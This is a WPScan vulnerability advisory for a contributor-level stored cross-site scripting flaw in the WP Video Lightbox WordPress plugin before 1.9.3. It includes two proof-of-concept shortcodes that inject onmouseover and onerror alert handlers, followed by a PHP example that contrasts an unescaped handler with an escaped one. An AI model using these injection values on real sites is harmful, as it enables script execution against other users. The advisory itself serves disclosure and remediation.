wpvulndb, Vishnupriya Ilango, WPVDB-ID:42A8947F-2AE5-4F12-BD3D-AB3716501DF5
Aug 23, 2021 - 12:00 a.m.

WP Video Lightbox < 1.9.3 - Contributor+ Stored Cross-Site Scripting

wpscan.com

EPSS: 0.001 (Low), percentile 19.4%

The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks.

PoC

[video_lightbox_vimeo5 video_id='"onmouseover=alert(/XSS/) b="' width="640" height="480" anchor="Click here to open vimeo video"]

[video_lightbox_vimeo5 video_id="13562192" width="640" height="480" anchor='http"onerror=alert(/XSS/)//']
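
The missing escaping described above, shown as an unescaped handler beside a corrected one. This is an added example for a WordPress plugin file, not the plugin's own code: the tag `demo_vimeo_lightbox`, both function names, the markup and the rule that an anchor starting with `http` renders as an image are assumptions; `shortcode_atts`, `add_query_arg`, `absint`, `esc_url` and `esc_html` are WordPress core functions.

```php
<?php
// Added example; not WP Video Lightbox's code. The tag demo_vimeo_lightbox,
// the function names and the generated markup are hypothetical.

// BEFORE: shortcode attributes are concatenated into HTML as-is, so a quote
// character in video_id or anchor closes the HTML attribute it sits in.
function demo_lightbox_unescaped( $atts ) {
	$defaults = array( 'video_id' => '', 'width' => '640', 'height' => '480', 'anchor' => '' );
	$a        = shortcode_atts( $defaults, $atts );
	// Assumption: an anchor starting with "http" is rendered as an image.
	$inner = ( 0 === strpos( $a['anchor'], 'http' ) )
		? '<img src="' . $a['anchor'] . '" />'
		: $a['anchor'];
	return '<a rel="lightbox" href="https://vimeo.com/' . $a['video_id']
		. '?width=' . $a['width'] . '&height=' . $a['height'] . '">' . $inner . '</a>';
}

// AFTER: validate each value by type, then escape it for its output context.
function demo_lightbox_escaped( $atts ) {
	$defaults = array( 'video_id' => '', 'width' => '640', 'height' => '480', 'anchor' => '' );
	$a        = shortcode_atts( $defaults, $atts, 'demo_vimeo_lightbox' );

	// Assumption: video IDs are digits only, as in the page's second sample.
	// ctype_digit() is false for the empty string, so a missing ID is rejected too.
	if ( ! ctype_digit( (string) $a['video_id'] ) ) {
		return '';
	}

	// Dimensions are forced to non-negative integers before entering the URL.
	$href = add_query_arg(
		array( 'width' => absint( $a['width'] ), 'height' => absint( $a['height'] ) ),
		'https://vimeo.com/' . $a['video_id']
	);

	$inner = ( 0 === strpos( $a['anchor'], 'http' ) )
		? '<img src="' . esc_url( $a['anchor'] ) . '" alt="" />' // URL in an attribute
		: esc_html( $a['anchor'] );                               // plain text node

	return '<a rel="lightbox" href="' . esc_url( $href ) . '">' . $inner . '</a>';
}

// Only the escaped handler is registered.
add_shortcode( 'demo_vimeo_lightbox', 'demo_lightbox_escaped' );
```

Contributors can save posts containing shortcodes, so escaping has to happen in the handler at render time rather than relying on who authored the post.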

CPE
Name               Operator  Version
wp-video-lightbox  lt        1.9.3
